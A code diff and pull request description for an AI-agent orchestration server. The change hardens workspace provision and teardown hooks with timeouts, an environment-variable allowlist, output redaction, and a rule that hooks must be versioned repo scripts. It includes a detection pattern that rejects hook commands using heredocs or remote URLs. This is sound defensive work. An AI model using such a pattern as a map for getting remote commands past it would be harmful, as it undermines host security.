+const DEFAULT_WORKSPACE_HOOK_TIMEOUT_MS = 300_000;
+const DEFAULT_WORKSPACE_HOOK_TIMEOUT_MAX_MS = 900_000;
+const WORKSPACE_HOOK_INHERITED_ENV_KEYS = [
+  "PATH",
+  "HOME",
+  "SHELL",
+  "PAPERCLIP_CONFIG",
+  "PAPERCLIP_HOME",
+  "PAPERCLIP_INSTANCE_ID",
+  "PAPERCLIP_WORKTREES_DIR",
+  "TMPDIR",
+  "TMP",
+  "TEMP",
+  "SystemRoot",
+  "WINDIR",
+  "ComSpec",
+];
 
 type ProcessOutputCapture = {
   text: string;
@@ -123,6 +141,38 @@ type ProcessOutputAccumulator = {
   append(chunk: string): void;
   finish(): ProcessOutputCapture;
 };
+
+export function resolveWorkspaceHookTimeoutMs(input: {
+  requestedMs?: number | null;
+  defaultMs?: number | null;
+  maxMs?: number | null;
+} = {}): number {
+  const envRequestedMs = Number.parseInt(
+    process.env.PAPERCLIP_WORKSPACE_HOOK_TIMEOUT_MS ?? "",
+    10,
+  );
+  const envMaxMs = Number.parseInt(
+    process.env.PAPERCLIP_WORKSPACE_HOOK_TIMEOUT_MAX_MS ?? "",
+    10,
+  );
+  const configuredMaxMs =
+    typeof input.maxMs === "number" && Number.isFinite(input.maxMs) && input.maxMs > 0
+      ? input.maxMs
+      : Number.isFinite(envMaxMs) && envMaxMs > 0
+        ? envMaxMs
+        : DEFAULT_WORKSPACE_HOOK_TIMEOUT_MAX_MS;
+  const configuredDefaultMs =
+    typeof input.defaultMs === "number" && Number.isFinite(input.defaultMs) && input.defaultMs > 0
+      ? input.defaultMs
+      : DEFAULT_WORKSPACE_HOOK_TIMEOUT_MS;
+  const requestedMs =
+    typeof input.requestedMs === "number" && Number.isFinite(input.requestedMs) && input.requestedMs > 0
+      ? input.requestedMs
+      : Number.isFinite(envRequestedMs) && envRequestedMs > 0
+        ? envRequestedMs
+        : configuredDefaultMs;
+  return Math.max(1, Math.trunc(Math.min(requestedMs, configuredMaxMs)));
+}
 
 export async function resetRuntimeServicesForTests() {
   for (const record of runtimeServicesById.values()) {
@@ -463,10 +513,13 @@ async function executeProcess(input: {
   env?: NodeJS.ProcessEnv;
   maxStdoutBytes?: number;
   maxStderrBytes?: number;
+  timeoutMs?: number;
 }): Promise<{
   stdout: string;
   stderr: string;
   code: number | null;
+  signal: NodeJS.Signals | null;
+  timedOut: boolean;
   stdoutTruncated: boolean;
   stderrTruncated: boolean;
   stdoutBytes: number;
@@ -476,12 +529,29 @@ async function executeProcess(input: {
     stdout: ProcessOutputAccumulator;
     stderr: ProcessOutputAccumulator;
     code: number | null;
+    signal: NodeJS.Signals | null;
+    timedOut: boolean;
   }>((resolve, reject) => {
+    let timedOut = false;
     const child = spawn(input.command, input.args, {
       cwd: input.cwd,
       stdio: ["ignore", "pipe", "pipe"],
       env: input.env ?? process.env,
     });
+    const timeoutMs =
+      typeof input.timeoutMs === "number" && Number.isFinite(input.timeoutMs) && input.timeoutMs > 0
+        ? Math.trunc(input.timeoutMs)
+        : null;
+    const timeout = timeoutMs
+      ? globalThis.setTimeout(() => {
+          timedOut = true;
+          child.kill("SIGTERM");
+          globalThis.setTimeout(() => {
+            if (!child.killed) child.kill("SIGKILL");
+          }, 2_000).unref();
+        }, timeoutMs)
+      : null;
+    timeout?.unref();
     const stdout = createProcessOutputCapture(input.maxStdoutBytes ?? DEFAULT_EXECUTE_PROCESS_OUTPUT_BYTES);
     const stderr = createProcessOutputCapture(input.maxStderrBytes ?? DEFAULT_EXECUTE_PROCESS_OUTPUT_BYTES);
     child.stdout?.on("data", (chunk) => {
@@ -491,14 +561,19 @@ async function executeProcess(input: {
       stderr.append(String(chunk));
     });
     child.on("error", reject);
-    child.on("close", (code) => resolve({ stdout, stderr, code }));
+    child.on("close", (code, signal) => {
+      if (timeout) clearTimeout(timeout);
+      resolve({ stdout, stderr, code, signal, timedOut });
+    });
   });
   const stdout = proc.stdout.finish();
   const stderr = proc.stderr.finish();
   return {
-    stdout: stdout.text,
-    stderr: stderr.text,
+    stdout: redactSensitiveText(stdout.text),
+    stderr: redactSensitiveText(stderr.text),
     code: proc.code,
+    signal: proc.signal,
+    timedOut: proc.timedOut,
     stdoutTruncated: stdout.truncated,
     stderrTruncated: stderr.truncated,
     stdoutBytes: stdout.totalBytes,
@@ -688,7 +763,7 @@ function buildWorkspaceCommandEnv(input: {
   agent: ExecutionWorkspaceAgentRef;
   created: boolean;
 }) {
-  const env: NodeJS.ProcessEnv = { ...process.env };
+  const env: NodeJS.ProcessEnv = buildWorkspaceHookBaseEnv(process.env);
   env.PAPERCLIP_WORKSPACE_CWD = input.worktreePath;
   env.PAPERCLIP_WORKSPACE_PATH = input.worktreePath;
   env.PAPERCLIP_WORKSPACE_WORKTREE_PATH = input.worktreePath;
@@ -710,13 +785,27 @@ function buildWorkspaceCommandEnv(input: {
   return env;
 }
 
+function buildWorkspaceHookBaseEnv(baseEnv: NodeJS.ProcessEnv): NodeJS.ProcessEnv {
+  const env: NodeJS.ProcessEnv = {};
+  for (const key of WORKSPACE_HOOK_INHERITED_ENV_KEYS) {
+    const value = baseEnv[key];
+    if (value !== undefined) {
+      env[key] = value;
+    }
+  }
+  return env;
+}
+
 function quoteShellArg(value: string) {
   return `'${value.replace(/'/g, `'\\''`)}'`;
 }
 
 function resolveRepoManagedWorkspaceCommand(command: string, repoRoot: string) {
+  if (/<<|https?:\/\//i.test(command)) {
+    throw new Error("Workspace hook command must be repo-managed and cannot use heredocs or remote URLs.");
+  }
   const patterns = [
-    /^(?<prefix>(?:bash|sh|zsh)\s+)(?<quote>["']?)(?<relative>\.\/[^"'\s]+)\k<quote>(?<suffix>(?:\s.*)?)$/s,
+    /^(?<prefix>(?:(?:bash|sh|zsh|node|python|python3|tsx)\s+))(?<quote>["']?)(?<relative>\.\/[^"'\s]+)\k<quote>(?<suffix>(?:\s.*)?)$/s,
     /^(?<quote>["']?)(?<relative>\.\/[^"'\s]+)\k<quote>(?<suffix>(?:\s.*)?)$/s,
   ];
 
@@ -725,15 +814,34 @@ function resolveRepoManagedWorkspaceCommand(command: string, repoRoot: string) {
     if (!match?.groups) continue;
 
     const relativePath = match.groups.relative;
-    const repoManagedPath = path.join(repoRoot, relativePath.slice(2));
-    if (!existsSync(repoManagedPath)) continue;
+    const repoManagedPath = path.resolve(repoRoot, relativePath.slice(2));
+    const resolvedRepoRoot = path.resolve(repoRoot);
+    if (repoManagedPath !== resolvedRepoRoot && !repoManagedPath.startsWith(`${resolvedRepoRoot}${path.sep}`)) {
+      throw new Error(`Workspace hook command must reference a path inside the repo: ${relativePath}`);
+    }
+    if (!existsSync(repoManagedPath)) {
+      throw new Error(`Workspace hook command must reference an existing repo-managed script: ${relativePath}`);
+    }
+    try {
+      execFileSync("git", ["-C", repoRoot, "ls-files", "--error-unmatch", relativePath.slice(2)], {
+        stdio: "ignore",
+      });
+    } catch {
+      throw new Error(`Workspace hook command must reference a versioned repo-managed script: ${relativePath}`);
+    }
 
     const prefix = match.groups.prefix ?? "";
     const suffix = match.groups.suffix ?? "";
     return `${prefix}${quoteShellArg(repoManagedPath)}${suffix}`;
   }
 
-  return command;
+  throw new Error(
+    'Workspace hook command must reference a repo-managed relative script, for example "bash ./scripts/provision.sh".',
+  );
+}
+
+export function assertWorkspaceHookCommandIsRepoManaged(command: string, repoRoot: string) {
+  resolveRepoManagedWorkspaceCommand(command, repoRoot);
 }
 
 async function runWorkspaceCommand(input: {
@@ -742,6 +850,7 @@ async function runWorkspaceCommand(input: {
   cwd: string;
   env: NodeJS.ProcessEnv;
   label: string;
+  timeoutMs?: number;
 }) {
   const shell = resolveShell();
   const proc = await executeProcess({
@@ -749,15 +858,30 @@ async function runWorkspaceCommand(input: {
     args: ["-c", input.resolvedCommand ?? input.command],
     cwd: input.cwd,
     env: input.env,
+    timeoutMs: input.timeoutMs,
   });
   if (proc.code === 0) return;
 
   const details = [proc.stderr.trim(), proc.stdout.trim()].filter(Boolean).join("\n");
   throw new Error(
-    details.length > 0
-      ? `${input.label} failed: ${details}`
-      : `${input.label} failed with exit code ${proc.code ?? -1}`,
+    proc.timedOut
+      ? `${input.label} timed out after ${input.timeoutMs ?? DEFAULT_WORKSPACE_HOOK_TIMEOUT_MS}ms`
+      : details.length > 0
+        ? `${input.label} failed: ${details}`
+        : `${input.label} failed with exit code ${proc.code ?? -1}`,
   );
+}
+
+function buildWorkspaceCommandOperationMetadata(input: {
+  metadata?: Record<string, unknown> | null;
+  env: NodeJS.ProcessEnv;
+  timeoutMs?: number;
+}) {
+  return redactEventPayload({
+    ...(input.metadata ?? {}),
+    envKeys: Object.keys(input.env).sort(),
+    timeoutMs: input.timeoutMs ?? null,
+  });
 }
 
 async function recordGitOperation(
@@ -833,6 +957,7 @@ async function recordWorkspaceCommandOperation(
     label: string;
     metadata?: Record<string, unknown> | null;
     successMessage?: string | null;
+    timeoutMs?: number;
   },
 ) {
   if (!recorder) {
@@ -845,9 +970,9 @@ async function recordWorkspaceCommandOperation(
   let code: number | null = null;
   const operation = await recorder.recordOperation({
     phase: input.phase,
-    command: input.command,
+    command: redactSensitiveText(input.command),
     cwd: input.cwd,
-    metadata: input.metadata ?? null,
+    metadata: buildWorkspaceCommandOperationMetadata(input),
     run: async () => {
       const shell = resolveShell();
       const result = await executeProcess({
@@ -855,23 +980,26 @@ async function recordWorkspaceCommandOperation(
         args: ["-c", input.resolvedCommand ?? input.command],
         cwd: input.cwd,
         env: input.env,
+        timeoutMs: input.timeoutMs,
       });
       stdout = result.stdout;
       stderr = result.stderr;
       code = result.code;
       return {
-        status: result.code === 0 ? "succeeded" : "failed",
+        status: result.code === 0 && !result.timedOut ? "succeeded" : "failed",
         exitCode: result.code,
         stdout: result.stdout,
         stderr: result.stderr,
         system: result.code === 0 ? input.successMessage ?? null : null,
         metadata:
-          result.stdoutTruncated || result.stderrTruncated
+          result.stdoutTruncated || result.stderrTruncated || result.timedOut
             ? {
                 stdoutTruncated: result.stdoutTruncated,
                 stderrTruncated: result.stderrTruncated,
                 stdoutBytes: result.stdoutBytes,
                 stderrBytes: result.stderrBytes,
+                timedOut: result.timedOut,
+                signal: result.signal,
               }
             : null,
       };
@@ -902,6 +1030,7 @@ async function provisionExecutionWorktree(input: {
   const provisionCommand = asString(input.strategy.provisionCommand, "").trim();
   if (!provisionCommand) return;
   const resolvedProvisionCommand = resolveRepoManagedWorkspaceCommand(provisionCommand, input.repoRoot);
+  const timeoutMs = resolveWorkspaceHookTimeoutMs();
 
   await recordWorkspaceCommandOperation(input.recorder, {
     phase: "workspace_provision",
@@ -926,6 +1055,7 @@ async function provisionExecutionWorktree(input: {
       resolvedCommand: resolvedProvisionCommand === provisionCommand ? null : resolvedProvisionCommand,
     },
     successMessage: `Provisioned workspace at ${input.worktreePath}\n`,
+    timeoutMs,
   });
 }
 
@@ -942,7 +1072,7 @@ function buildExecutionWorkspaceCleanupEnv(input: {
   };
   projectWorkspaceCwd?: string | null;
 }) {
-  const env: NodeJS.ProcessEnv = sanitizeRuntimeServiceBaseEnv(process.env);
+  const env: NodeJS.ProcessEnv = buildWorkspaceHookBaseEnv(process.env);
   env.PAPERCLIP_WORKSPACE_CWD = input.workspace.cwd ?? "";
   env.PAPERCLIP_WORKSPACE_PATH = input.workspace.cwd ?? "";
   env.PAPERCLIP_WORKSPACE_WORKTREE_PATH =
@@ -1350,6 +1480,7 @@ export async function cleanupExecutionWorkspaceArtifacts(input: {
       const resolvedCommand = repoRoot
         ? resolveRepoManagedWorkspaceCommand(command, repoRoot)
         : command;
+      const timeoutMs = resolveWorkspaceHookTimeoutMs();
       await recordWorkspaceCommandOperation(input.recorder, {
         phase: "workspace_teardown",
         command,
@@ -1365,6 +1496,7 @@ export async function cleanupExecutionWorkspaceArtifacts(input: {
           resolvedCommand: resolvedCommand === command ? null : resolvedCommand,
         },
         successMessage: `Completed cleanup command "${command}"\n`,
+        timeoutMs,
       });
     } catch (err) {
       warnings.push(err instanceof Error ? err.message : String(err));


### PR DESCRIPTION
## Thinking Path

> - Paperclip orchestrates AI agents through issue-scoped execution workspaces.
> - Worktree provision and teardown hooks are host-executed before or around adapter runs.
> - TIV-289 requires the MVP to reject arbitrary issue/worktree shell snippets and keep hooks governed by repo code review.
> - The runtime also needs bounded execution, env minimization, redacted evidence, and parity for remote provision paths.
> - This pull request adds repo-managed hook validation, timeout/env/redaction guardrails, close snapshots, and focused tests.
> - The benefit is safer worktree bootstrap/cleanup without letting agent keys create host-executed commands.

## What Changed

- Added repo-managed/versioned hook validation for provision/teardown commands, rejecting arbitrary shell, heredocs, URLs, missing scripts, and untracked scripts.
- Added hook timeout resolution with default 300s and max cap, explicit hook env allowlist, redacted/truncated output evidence, and remote provision parity.
- Persisted execution workspace metadata.closeSnapshot before cleanup and updated it with completed/incomplete/failed cleanup evidence.
- Added route/runtime/orchestrator tests plus a governed hook runbook at docs/how-to/setup-paperclip.md.

## Verification

- pnpm exec vitest run server/src/__tests__/workspace-runtime.test.ts -t 'rejects non repo-managed provision commands|passes only allowlisted env keys|caps configured workspace hook timeouts|records teardown and cleanup operations|writes an isolated repo-local Paperclip config'
- pnpm exec vitest run server/src/__tests__/environment-run-orchestrator.test.ts -t 'remote provision|project-level provision|provision command failures'
- pnpm exec vitest run server/src/__tests__/execution-workspaces-routes.test.ts server/src/__tests__/workspace-runtime-routes-authz.test.ts
- pnpm --filter @paperclipai/server typecheck
- git diff --check origin/master...HEAD
- pnpm exec prettier --check ... was attempted but this workspace has no prettier binary.

## Risks

- Existing configured provision/cleanup hooks that are inline shell commands now fail until moved into versioned repo scripts.
- Remote provision commands must reference the realized repo script path and cannot install tools through arbitrary inline commands.
- The hook allowlist keeps Paperclip config fields needed by bundled worktree init, but intentionally drops unrelated process env and secrets.

> For core feature work, check [ROADMAP.md](ROADMAP.md) first and discuss it in #dev before opening the PR. Feature PRs that overlap with planned core work may need to be redirected. See CONTRIBUTING.md.

## Model Used

- OpenAI Codex GPT-5 via Paperclip local agent, tool-enabled coding session with terminal execution.

## Checklist

- [x] I have included a thinking path that traces from project context to this change
- [x] I have specified the model used (with version and capability details)
- [x] I have checked ROADMAP.md and confirmed this PR does not duplicate planned core work
- [x] I have run tests locally and they pass
- [x] I have added or updated tests where applicable
- [ ] If this change affects the UI, I have included before/after screenshots
- [x] I have updated relevant documentation to reflect my changes
- [x] I have considered and documented any risks above
- [x] I will address all Greptile and reviewer comments before requesting merge
